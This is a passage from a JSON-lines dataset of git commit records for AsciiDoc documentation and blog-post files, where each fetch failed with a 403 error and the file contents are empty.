time\n","repos":"dedickinson\/engineering-notebook,dedickinson\/engineering-notebook,dedickinson\/engineering-notebook,dedickinson\/engineering-notebook,dedickinson\/engineering-notebook,dedickinson\/engineering-notebook,dedickinson\/engineering-notebook,dedickinson\/engineering-notebook","old_file":"packer\/base-atomic\/README.adoc","new_file":"packer\/base-atomic\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dedickinson\/engineering-notebook.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b9de065afc88c5e343ec70725c6707fd625a58a5","subject":"Update 2016-6-29-PHP-CSV.adoc","message":"Update 
2016-6-29-PHP-CSV.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-29-PHP-CSV.adoc","new_file":"_posts\/2016-6-29-PHP-CSV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cdc847678df6267fddc2140b06a2708af3c89e3e","subject":"Update 2016-09-23-wtf-log.adoc","message":"Update 2016-09-23-wtf-log.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-23-wtf-log.adoc","new_file":"_posts\/2016-09-23-wtf-log.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a1b05ae217e467cad65a6cbc1804f601d6e13d0","subject":"Update 2016-09-23-wtf-log.adoc","message":"Update 2016-09-23-wtf-log.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-23-wtf-log.adoc","new_file":"_posts\/2016-09-23-wtf-log.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc765c46ff7db445a5e06c4be7b9c59b672ab2f8","subject":"Update 2016-09-23-wtf-log.adoc","message":"Update 2016-09-23-wtf-log.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-23-wtf-log.adoc","new_file":"_posts\/2016-09-23-wtf-log.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4200d58f162fadcb8f20846b43a032bf5c98ec5d","subject":"Update 2017-10-09-Azure-7.adoc","message":"Update 2017-10-09-Azure-7.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-09-Azure-7.adoc","new_file":"_posts\/2017-10-09-Azure-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1225a5118442d38a6e3e618d4c8077da5035f76f","subject":"Update 2018-11-08-develop.adoc","message":"Update 2018-11-08-develop.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-develop.adoc","new_file":"_posts\/2018-11-08-develop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned 
error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f0b3a00c89415e3596deac37beab2a3c2fe2e8c","subject":"Update 2016-04-07-Un-poco-sobre-F-T-P.adoc","message":"Update 2016-04-07-Un-poco-sobre-F-T-P.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Un-poco-sobre-F-T-P.adoc","new_file":"_posts\/2016-04-07-Un-poco-sobre-F-T-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4be26550e500f42b15cbd1263e8fe3b32ac6f667","subject":"Update 2017-06-11-vimmer1.adoc","message":"Update 2017-06-11-vimmer1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-11-vimmer1.adoc","new_file":"_posts\/2017-06-11-vimmer1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"431b48b1c74524f7b9d6477b5a58bf913fb1c079","subject":"Update 2017-08-15-Azure-6.adoc","message":"Update 2017-08-15-Azure-6.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-15-Azure-6.adoc","new_file":"_posts\/2017-08-15-Azure-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7a6c99934d38fb784e22d06e8287d32c52473f5","subject":"Update DS_Store-undefined.adoc","message":"Update DS_Store-undefined.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/DS_Store-undefined.adoc","new_file":"_posts\/DS_Store-undefined.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"740ebef188c45f5dfe53da20f949c7677c5e94ec","subject":"Add note for ugettext in OSIS","message":"Add note for ugettext in OSIS\n","repos":"uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"87984fffe3b047cf786927a5e3fff9e027ec94a5","subject":"job: #11992 Introducing analysis note for import .prj files as Deployments.","message":"job: #11992 Introducing analysis note for import .prj files as 
Deployments.\n","repos":"lwriemen\/mc,rmulvey\/mc,cortlandstarrett\/mc,xtuml\/mc,lwriemen\/mc,leviathan747\/mc,rmulvey\/mc,cortlandstarrett\/mc,lwriemen\/mc,rmulvey\/mc,cortlandstarrett\/mc,xtuml\/mc,rmulvey\/mc,xtuml\/mc,leviathan747\/mc,leviathan747\/mc,lwriemen\/mc,lwriemen\/mc,leviathan747\/mc,xtuml\/mc,leviathan747\/mc,rmulvey\/mc,lwriemen\/mc,rmulvey\/mc,cortlandstarrett\/mc,leviathan747\/mc,cortlandstarrett\/mc,xtuml\/mc,cortlandstarrett\/mc,xtuml\/mc","old_file":"doc\/notes\/11444_wasl\/11992_import_deployments_ant.adoc","new_file":"doc\/notes\/11444_wasl\/11992_import_deployments_ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9886c8efad6693f742ec225722a1cc1e0154e9f2","subject":"Update 2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","message":"Update 2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","new_file":"_posts\/2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a517c501dbba82bccab4983f58278eb52e03d41f","subject":"Update 2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","message":"Update 2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7d08f37dd1e45dbf4e27cbfc252b68f4e966750","subject":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e874205fd22f78ed85d15d498ee075f0489a6925","subject":"Regenerated without unnecessary empty lines","message":"Regenerated without unnecessary empty lines\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"tck\/index.adoc","new_file":"tck\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"68f6fd9bfd640c3d71d19e01bcf0fe3582ca70bb","subject":"Update 
2015-04-02-First-Post.adoc","message":"Update 2015-04-02-First-Post.adoc","repos":"CBSti\/CBSti.github.io,CBSti\/CBSti.github.io,CBSti\/CBSti.github.io","old_file":"_posts\/2015-04-02-First-Post.adoc","new_file":"_posts\/2015-04-02-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CBSti\/CBSti.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8f74af5cf57d9a5246263280feade2117262517","subject":"Update 2015-09-21-SQL-review.adoc","message":"Update 2015-09-21-SQL-review.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-21-SQL-review.adoc","new_file":"_posts\/2015-09-21-SQL-review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3a54156a6d369db556086995d7371f72ae7ff92","subject":"Update 2017-04-14-Metal-Case.adoc","message":"Update 2017-04-14-Metal-Case.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-04-14-Metal-Case.adoc","new_file":"_posts\/2017-04-14-Metal-Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a406c40ff569f4af30ca89a319e116ccc382a44","subject":"Added first revision of week 2 content","message":"Added first revision of week 2 content\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c95042dd0acaa45b3db379a2cdd377d607f91385","subject":"mention platform support","message":"mention platform 
support\n","repos":"autopulated\/ninja,fuchsia-mirror\/third_party-ninja,mdempsky\/ninja,colincross\/ninja,ThiagoGarciaAlves\/ninja,maximuska\/ninja,mydongistiny\/ninja,glensc\/ninja,yannicklm\/ninja,nocnokneo\/ninja,vvvrrooomm\/ninja,pck\/ninja,moroten\/ninja,ThiagoGarciaAlves\/ninja,jhanssen\/ninja,bmeurer\/ninja,nickhutchinson\/ninja,fifoforlifo\/ninja,drbo\/ninja,Ju2ender\/ninja,nicolasdespres\/ninja,ninja-build\/ninja,ikarienator\/ninja,iwadon\/ninja,vvvrrooomm\/ninja,ThiagoGarciaAlves\/ninja,nafest\/ninja,ehird\/ninja,ndsol\/subninja,AoD314\/ninja,tfarina\/ninja,iwadon\/ninja,lizh06\/ninja,automeka\/ninja,ikarienator\/ninja,sorbits\/ninja,iwadon\/ninja,ehird\/ninja,jimon\/ninja,synaptek\/ninja,lizh06\/ninja,hnney\/ninja,liukd\/ninja,dpwright\/ninja,tfarina\/ninja,Maratyszcza\/ninja-pypi,sxlin\/dist_ninja,pck\/ninja,LuaDist\/ninja,nafest\/ninja,nafest\/ninja,Ju2ender\/ninja,lizh06\/ninja,martine\/ninja,iwadon\/ninja,kimgr\/ninja,mydongistiny\/ninja,maximuska\/ninja,pathscale\/ninja,jimon\/ninja,barak\/ninja,mohamed\/ninja,chenyukang\/ninja,kissthink\/ninja,ndsol\/subninja,autopulated\/ninja,syntheticpp\/ninja,nico\/ninja,moroten\/ninja,bradking\/ninja,PetrWolf\/ninja-main,nocnokneo\/ninja,nafest\/ninja,dendy\/ninja,glensc\/ninja,sorbits\/ninja,automeka\/ninja,Qix-\/ninja,ctiller\/ninja,hnney\/ninja,nicolasdespres\/ninja,metti\/ninja,curinir\/ninja,martine\/ninja,kimgr\/ninja,jsternberg\/ninja,ctiller\/ninja,jimon\/ninja,nocnokneo\/ninja,mohamed\/ninja,dorgonman\/ninja,sxlin\/dist_ninja,TheOneRing\/ninja,dpwright\/ninja,ikarienator\/ninja,nicolasdespres\/ninja,ninja-build\/ninja,Maratyszcza\/ninja-pypi,chenyukang\/ninja,ndsol\/subninja,dabrahams\/ninja,pck\/ninja,mutac\/ninja,moroten\/ninja,glensc\/ninja,jendrikillner\/ninja,LuaDist\/ninja,glensc\/ninja,liukd\/ninja,rnk\/ninja,sxlin\/dist_ninja,Qix-\/ninja,syntheticpp\/ninja,sorbits\/ninja,LuaDist\/ninja,pathscale\/ninja,TheOneRing\/ninja,jendrikillner\/ninja,nickhutchinson\/ninja,colincross\/ninja,nico\/ninja,curinir\/ninja,guiquanz\/ninja,jhanssen\/ninja,jsternberg\/ninja,jendrikillner\/ninja,dabrahams\/ninja,kissthink\/ninja,nicolasdespres\/ninja,liukd\/ninja,moroten\/ninja,nickhutchinson\/ninja,sxlin\/dist_ninja,curinir\/ninja,TheOneRing\/ninja,ukai\/ninja,tfarina\/ninja,sgraham\/ninja,ignatenkobrain\/ninja,sgraham\/ninja,dorgonman\/ninja,jhanssen\/ninja,dorgonman\/ninja,PetrWolf\/ninja-main,ikarienator\/ninja,rjogrady\/ninja,ignatenkobrain\/ninja,Qix-\/ninja,mohamed\/ninja,ukai\/ninja,ehird\/ninja,mdempsky\/ninja,hnney\/ninja,dorgonman\/ninja,curinir\/ninja,sxlin\/dist_ninja,liukd\/ninja,jimon\/ninja,ctiller\/ninja,fifoforlifo\/ninja,TheOneRing\/ninja,hnney\/ninja,kimgr\/ninja,juntalis\/ninja,AoD314\/ninja,synaptek\/ninja,pck\/ninja,maruel\/ninja,ukai\/ninja,guiquanz\/ninja,bradking\/ninja,sxlin\/dist_ninja,nico\/ninja,atetubou\/ninja,nickhutchinson\/ninja,vvvrrooomm\/ninja,ctiller\/ninja,atetubou\/ninja,ninja-build\/ninja,metti\/ninja,Ju2ender\/ninja,purcell\/ninja,ehird\/ninja,okuoku\/ninja,ilor\/ninja,mohamed\/ninja,juntalis\/ninja,ukai\/ninja,autopulated\/ninja,synaptek\/ninja,drbo\/ninja,sgraham\/ninja,bradking\/ninja,metti\/ninja,dendy\/ninja,ThiagoGarciaAlves\/ninja,rnk\/ninja,purcell\/ninja,okuoku\/ninja,dabrahams\/ninja,purcell\/ninja,martine\/ninja,metti\/ninja,bradking\/ninja,lizh06\/ninja,Maratyszcza\/ninja-pypi,colincross\/ninja,maruel\/ninja,dpwright\/ninja,barak\/ninja,okuoku\/ninja,dendy\/ninja,jsternberg\/ninja,chenyukang\/ninja,syntheticpp\/ninja,maximuska\/ninja,yannicklm\/ninja,atetubou\/ninja,colincross\/ninja,
kimgr\/ninja,ignatenkobrain\/ninja,vvvrrooomm\/ninja,sgraham\/ninja,rnk\/ninja,bmeurer\/ninja,okuoku\/ninja,jendrikillner\/ninja,PetrWolf\/ninja-main,sorbits\/ninja,pathscale\/ninja,AoD314\/ninja,juntalis\/ninja,mdempsky\/ninja,mgaunard\/ninja,Ju2ender\/ninja,yannicklm\/ninja,purcell\/ninja,fifoforlifo\/ninja,bmeurer\/ninja,yannicklm\/ninja,dabrahams\/ninja,barak\/ninja,pathscale\/ninja,nocnokneo\/ninja,syntheticpp\/ninja,LuaDist\/ninja,dpwright\/ninja,PetrWolf\/ninja-main,tfarina\/ninja,mydongistiny\/ninja,mutac\/ninja,fuchsia-mirror\/third_party-ninja,automeka\/ninja,drbo\/ninja,jsternberg\/ninja,mutac\/ninja,rnk\/ninja,fuchsia-mirror\/third_party-ninja,synaptek\/ninja,jhanssen\/ninja,guiquanz\/ninja,fuchsia-mirror\/third_party-ninja,juntalis\/ninja,atetubou\/ninja,ignatenkobrain\/ninja,maruel\/ninja,mgaunard\/ninja,bmeurer\/ninja,maximuska\/ninja,martine\/ninja,barak\/ninja,chenyukang\/ninja,Qix-\/ninja,rjogrady\/ninja,Maratyszcza\/ninja-pypi,fifoforlifo\/ninja,nico\/ninja,automeka\/ninja,ilor\/ninja,AoD314\/ninja,kissthink\/ninja,mydongistiny\/ninja,ilor\/ninja,mgaunard\/ninja,rjogrady\/ninja,dendy\/ninja,mutac\/ninja,maruel\/ninja,ilor\/ninja,kissthink\/ninja,autopulated\/ninja,guiquanz\/ninja,rjogrady\/ninja,ninja-build\/ninja,ndsol\/subninja,mdempsky\/ninja,mgaunard\/ninja,drbo\/ninja,sxlin\/dist_ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nafest\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eaa4d6c22c5aeae1ef42a85a62dbedf86d546b07","subject":"update some windows references in the docs","message":"update some windows references in the docs\n\nDrop the timing info, it's too variable to commit to a 
manual.\n","repos":"iwadon\/ninja,jendrikillner\/ninja,maruel\/ninja,juntalis\/ninja,jimon\/ninja,hnney\/ninja,TheOneRing\/ninja,guiquanz\/ninja,rnk\/ninja,atetubou\/ninja,Qix-\/ninja,sgraham\/ninja,mydongistiny\/ninja,juntalis\/ninja,mdempsky\/ninja,synaptek\/ninja,autopulated\/ninja,dorgonman\/ninja,mohamed\/ninja,kissthink\/ninja,ilor\/ninja,rjogrady\/ninja,syntheticpp\/ninja,iwadon\/ninja,ThiagoGarciaAlves\/ninja,sxlin\/dist_ninja,jendrikillner\/ninja,yannicklm\/ninja,sxlin\/dist_ninja,pathscale\/ninja,pathscale\/ninja,drbo\/ninja,rnk\/ninja,purcell\/ninja,purcell\/ninja,ninja-build\/ninja,AoD314\/ninja,jimon\/ninja,mydongistiny\/ninja,jhanssen\/ninja,nicolasdespres\/ninja,pathscale\/ninja,automeka\/ninja,lizh06\/ninja,tfarina\/ninja,rjogrady\/ninja,kissthink\/ninja,mohamed\/ninja,nico\/ninja,kimgr\/ninja,glensc\/ninja,fifoforlifo\/ninja,nocnokneo\/ninja,tfarina\/ninja,sorbits\/ninja,vvvrrooomm\/ninja,synaptek\/ninja,mgaunard\/ninja,guiquanz\/ninja,synaptek\/ninja,ctiller\/ninja,fuchsia-mirror\/third_party-ninja,vvvrrooomm\/ninja,liukd\/ninja,syntheticpp\/ninja,iwadon\/ninja,martine\/ninja,martine\/ninja,liukd\/ninja,mydongistiny\/ninja,jimon\/ninja,syntheticpp\/ninja,jendrikillner\/ninja,ignatenkobrain\/ninja,dorgonman\/ninja,nico\/ninja,fifoforlifo\/ninja,ctiller\/ninja,dorgonman\/ninja,ilor\/ninja,kimgr\/ninja,martine\/ninja,iwadon\/ninja,metti\/ninja,ndsol\/subninja,dorgonman\/ninja,nafest\/ninja,hnney\/ninja,ilor\/ninja,Ju2ender\/ninja,mydongistiny\/ninja,rjogrady\/ninja,dendy\/ninja,mgaunard\/ninja,nico\/ninja,yannicklm\/ninja,metti\/ninja,sgraham\/ninja,nafest\/ninja,fifoforlifo\/ninja,sxlin\/dist_ninja,dpwright\/ninja,mohamed\/ninja,tfarina\/ninja,moroten\/ninja,lizh06\/ninja,fuchsia-mirror\/third_party-ninja,lizh06\/ninja,fuchsia-mirror\/third_party-ninja,mdempsky\/ninja,bradking\/ninja,nickhutchinson\/ninja,ignatenkobrain\/ninja,autopulated\/ninja,nicolasdespres\/ninja,Maratyszcza\/ninja-pypi,Ju2ender\/ninja,jhanssen\/ninja,metti\/ninja,metti\/ninja,ThiagoGarciaAlves\/ninja,Maratyszcza\/ninja-pypi,automeka\/ninja,TheOneRing\/ninja,ndsol\/subninja,sorbits\/ninja,jhanssen\/ninja,juntalis\/ninja,ignatenkobrain\/ninja,rjogrady\/ninja,Maratyszcza\/ninja-pypi,glensc\/ninja,nickhutchinson\/ninja,ThiagoGarciaAlves\/ninja,nocnokneo\/ninja,liukd\/ninja,jimon\/ninja,autopulated\/ninja,nocnokneo\/ninja,moroten\/ninja,maruel\/ninja,yannicklm\/ninja,syntheticpp\/ninja,lizh06\/ninja,ndsol\/subninja,mgaunard\/ninja,nafest\/ninja,kimgr\/ninja,tfarina\/ninja,dpwright\/ninja,TheOneRing\/ninja,ctiller\/ninja,fifoforlifo\/ninja,purcell\/ninja,AoD314\/ninja,autopulated\/ninja,glensc\/ninja,bradking\/ninja,drbo\/ninja,martine\/ninja,juntalis\/ninja,maruel\/ninja,nafest\/ninja,synaptek\/ninja,bmeurer\/ninja,pathscale\/ninja,automeka\/ninja,kissthink\/ninja,Qix-\/ninja,ilor\/ninja,jendrikillner\/ninja,sorbits\/ninja,sorbits\/ninja,nico\/ninja,nicolasdespres\/ninja,atetubou\/ninja,dendy\/ninja,nocnokneo\/ninja,colincross\/ninja,dendy\/ninja,bmeurer\/ninja,bradking\/ninja,ctiller\/ninja,colincross\/ninja,drbo\/ninja,purcell\/ninja,liukd\/ninja,TheOneRing\/ninja,atetubou\/ninja,ndsol\/subninja,yannicklm\/ninja,sxlin\/dist_ninja,sxlin\/dist_ninja,rnk\/ninja,vvvrrooomm\/ninja,jhanssen\/ninja,bmeurer\/ninja,bradking\/ninja,moroten\/ninja,colincross\/ninja,ThiagoGarciaAlves\/ninja,Qix-\/ninja,hnney\/ninja,Qix-\/ninja,colincross\/ninja,rnk\/ninja,ninja-build\/ninja,sgraham\/ninja,nicolasdespres\/ninja,nickhutchinson\/ninja,dpwright\/ninja,ignatenkobrain\/ninja,dpwright\/ninja,Ju2ender\/ninja,mdempsky\/ninja,J
u2ender\/ninja,Maratyszcza\/ninja-pypi,sxlin\/dist_ninja,mgaunard\/ninja,kimgr\/ninja,dendy\/ninja,automeka\/ninja,nickhutchinson\/ninja,AoD314\/ninja,drbo\/ninja,sxlin\/dist_ninja,guiquanz\/ninja,bmeurer\/ninja,mohamed\/ninja,moroten\/ninja,mdempsky\/ninja,hnney\/ninja,maruel\/ninja,glensc\/ninja,atetubou\/ninja,AoD314\/ninja,sgraham\/ninja,ninja-build\/ninja,kissthink\/ninja,guiquanz\/ninja,fuchsia-mirror\/third_party-ninja,ninja-build\/ninja,vvvrrooomm\/ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lizh06\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6dd466fa02358ea02c0d8173226d8490ce01998e","subject":"Update 2016-05-06-Welcome-Pepper.adoc","message":"Update 2016-05-06-Welcome-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"301c326a9827a57f142875446a4ec7b1e75df99d","subject":"Update 2017-01-19-Swift-Web-View.adoc","message":"Update 2017-01-19-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad2838cb3492b4141aaae75556b7be4c735b5ea9","subject":"Update 2017-01-01-Streaming-Video-di-OSMC.adoc","message":"Update 2017-01-01-Streaming-Video-di-OSMC.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2017-01-01-Streaming-Video-di-OSMC.adoc","new_file":"_posts\/2017-01-01-Streaming-Video-di-OSMC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f2e7a908a0de73d7a9a2609f7af88f790084d1d","subject":"Updated documentation","message":"Updated documentation\n","repos":"RobWin\/javaslang-circuitbreaker,storozhukBM\/javaslang-circuitbreaker,goldobin\/resilience4j,javaslang\/javaslang-circuitbreaker,resilience4j\/resilience4j,mehtabsinghmann\/resilience4j,drmaas\/resilience4j,drmaas\/resilience4j,RobWin\/circuitbreaker-java8,resilience4j\/resilience4j","old_file":"src\/docs\/asciidoc\/usage_guide.adoc","new_file":"src\/docs\/asciidoc\/usage_guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"75a9a7bca0abb697594d015e7c1ec32fcaf45e28","subject":"Add missing file","message":"Add missing 
file\n","repos":"stuartwdouglas\/wildfly.org,rhusar\/wildfly.org,stuartwdouglas\/wildfly.org,adrianoschmidt\/wildfly.org,luck3y\/wildfly.org,luck3y\/wildfly.org,luck3y\/wildfly.org,adrianoschmidt\/wildfly.org,stuartwdouglas\/wildfly.org,adrianoschmidt\/wildfly.org,ctomc\/wildfly.org,stuartwdouglas\/wildfly.org,rhusar\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,rhusar\/wildfly.org,adrianoschmidt\/wildfly.org,luck3y\/wildfly.org,rhusar\/wildfly.org","old_file":"news\/2015-06-10-WildFly9-CR2-Released.adoc","new_file":"news\/2015-06-10-WildFly9-CR2-Released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rhusar\/wildfly.org.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fbde886e689502be522df90134f950ecfa450477","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/showdown.asciidoc","new_file":"_brainstorms\/showdown.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 